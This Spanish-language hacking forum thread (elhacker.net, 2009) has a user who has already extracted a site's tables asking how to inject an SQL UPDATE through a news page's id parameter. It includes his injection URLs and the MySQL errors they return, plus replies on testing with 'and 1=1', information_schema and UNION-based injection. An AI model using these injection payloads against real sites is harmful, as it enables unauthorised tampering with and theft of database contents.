elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Inyeccion SQL (mysql) UPDATE dentro de un SELECT
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Inyeccion SQL (mysql) UPDATE dentro de un SELECT  (Leído 17,177 veces)
odeONeSs

Desconectado Desconectado

Mensajes: 125


programo luego existo!


Ver Perfil
Inyeccion SQL (mysql) UPDATE dentro de un SELECT
« en: 16 Enero 2009, 00:34 am »

Os cuento mas o menos, he conseguido sacar todas las tablas, pero al intentar hacer un update me salta un filtro por la comilla, ya que al poner comilla simple el codigo php lo remplaza por '\\\'.


Código
  1. http://www.web.com/noticia.php?id=-1'; UPDATE Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+;/*
  2.  
El error que devuelve es este:

Código
  1. You have an error in your SQL syntax; check the manual that
  2. corresponds to your MySQL server version for the right syntax to use near
  3. '\\\';UPDATE web.noticias SET breve = 0x4572726f72 WHERE id = 8 ;/*' at line 1

Alguna vez os habeis encontrado con esto? alguna idea?

Gracias de antemano!
« Última modificación: 17 Febrero 2009, 18:24 pm por sirdarckcat » En línea

Cambio de firma de prueba
Darioxhcx


Desconectado Desconectado

Mensajes: 2.292


Ver Perfil
Re: Inyeccion Sql Filtro
« Respuesta #1 en: 16 Enero 2009, 08:01 am »

con information_schema trataste ?
o no existe ?? emmmmm
En línea

WHK
Moderador
***
Conectado Conectado

Mensajes: 6.442


The Hacktivism is not a crime


Ver Perfil WWW
Re: Inyeccion Sql Filtro
« Respuesta #2 en: 16 Enero 2009, 08:48 am »

intenta sacarlo sin comillas para ver si realmente es necesario;
http://www.web.com/noticia.php?id=1 and 1=1
Si no te funciona y obligadamente necesitas escapar con esa comilla no puedes hacer nada por los slashses que agrega el php.
En línea

Telegram: @WHK102 - Semáforo Epidemiologico Chile
odeONeSs

Desconectado Desconectado

Mensajes: 125


programo luego existo!


Ver Perfil
Re: Inyeccion Sql Filtro
« Respuesta #3 en: 16 Enero 2009, 13:44 pm »

con information_schema trataste ?
o no existe ?? emmmmm

Si si, tengo la tabla donde quiero hacer el UPDATE, las columnas y he hecho pruebas haciendo consultas, vamos que si que existe.

Leyendo por ahi... he intentado aplicar esto... pero na da..

Por cierto WHK http://www.web.com/noticia.php?id=1 and 1=1 Esto no me tira error, debe ser que los slashses estan puestos para evitar los strings.

Código
  1. http://www.web.com/noticia.php?id=-1+and+(UPDATE+Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+)=1/*
  2.  
Código
  1. You have an error in your SQL syntax; check the manual that
  2. corresponds to your MySQL server version for the right syntax to use near
  3. 'UPDATE Basededatos.noticias SET breve = 0x4572726f72 WHERE id = 8 )=1/*' at line 1

Alguna idea???

Muchas gracias!!
« Última modificación: 16 Enero 2009, 17:16 pm por odeONeSs » En línea

Cambio de firma de prueba
pepeluxx


Desconectado Desconectado

Mensajes: 347


Todos los días se aprende algo nuevo


Ver Perfil WWW
Re: Inyeccion Sql Filtro
« Respuesta #4 en: 13 Febrero 2009, 16:24 pm »

Código
  1. http://www.web.com/noticia.php?id=-1+and+(UPDATE+Basededatos.noticias+SET+breve+=+0x4572726f72+WHERE+id+=+8+)=1/*
  2.  

No puedes meter un update dentro de un select  :rolleyes:
En línea

Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Inyeccion Sql Filtro
« Respuesta #5 en: 16 Febrero 2009, 22:28 pm »

hay no veo ningun select  :P
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.185


>.<


Ver Perfil WWW
Re: Inyeccion Sql Filtro
« Respuesta #6 en: 17 Febrero 2009, 00:37 am »

jahahahahah!!!!

y entonces como hacen para obtener los registros de la base de datos?

el SELECT va implicito :D al hacer una consulta a tu base de datos
En línea

Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Inyeccion Sql Filtro
« Respuesta #7 en: 17 Febrero 2009, 02:01 am »

No te rias toy enfermo a si que no tengo todas mis neuronas funcionando  :¬¬ .

Si , cierto que el select esta en el noticia.php.
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
Azielito
no es
Colaborador
***
Desconectado Desconectado

Mensajes: 9.185


>.<


Ver Perfil WWW
Re: Inyeccion Sql Filtro
« Respuesta #8 en: 17 Febrero 2009, 17:42 pm »

perdon, es que me hizo gracia :xD

no es personal pues, disculpa...

Te explico

cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto
Código
  1. SELECT * FROM `noticias` WHERE id=$_GET['id']
  2.  

Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT"

quedando algo así

Código
  1. SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2.....
  2.                                  ^aqui nuestro code

o sea que, el "SELECT" va implicito :o
« Última modificación: 17 Febrero 2009, 17:52 pm por Azielito » En línea

Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Inyeccion Sql Filtro
« Respuesta #9 en: 17 Febrero 2009, 18:00 pm »

perdon, es que me hizo gracia :xD

no es personal pues, disculpa...

No importa  ;D

Citar
Te explico

cuando haces una web que toma datos de una base de datos, para recuperar haces algo parecido a esto
Código
  1. SELECT * FROM `noticias` WHERE id=$_GET['id']
  2.  

Siempre haces eso (es un ejemplo xD) cuando haces un sistema de noticias, pero siempre tienes un "select" lo que hacemos a la hora de una SQLinjection es modificar ese "SELECT"

quedando algo así

Código
  1. SELECT * FROM `noticias` WHERE id=-1 AND UNION SELEC 0,1,2.....
  2.                                  ^aqui nuestro code

o sea que, el "SELECT" va implicito :o

Si me lo explicabas a mi , ya lo se  :xD si se hacer consultas desde PHP  ;) , aunque nunca esta de mas una explicacion para los que no entienden  ;)
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Update] Select All Friends Script - Facebook
Scripting
[D4N93R] 0 2,820 Último mensaje 23 Abril 2011, 00:17 am
por [D4N93R]
¿Cómo puedo hacer un UPDATE?:) (Dentro BD 8) ) (Solucionado)
Nivel Web
isopo 7 2,897 Último mensaje 12 Julio 2011, 19:23 pm
por Shell Root
[PHP+MYSQL] Sumar a una cifra mediante UPDATE, sin SELECT previo
PHP
Servia 3 22,275 Último mensaje 29 Julio 2011, 00:53 am
por Shell Root
Insertar datos con un update, dentro de otro update con SQLi(Mysql)
Nivel Web
WarGhost 3 4,610 Último mensaje 23 Agosto 2011, 03:37 am
por WarGhost
Problema al pasar a Mysql un Select
Bases de Datos
David Vans 3 3,164 Último mensaje 1 Septiembre 2011, 04:55 am
por seba123neo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines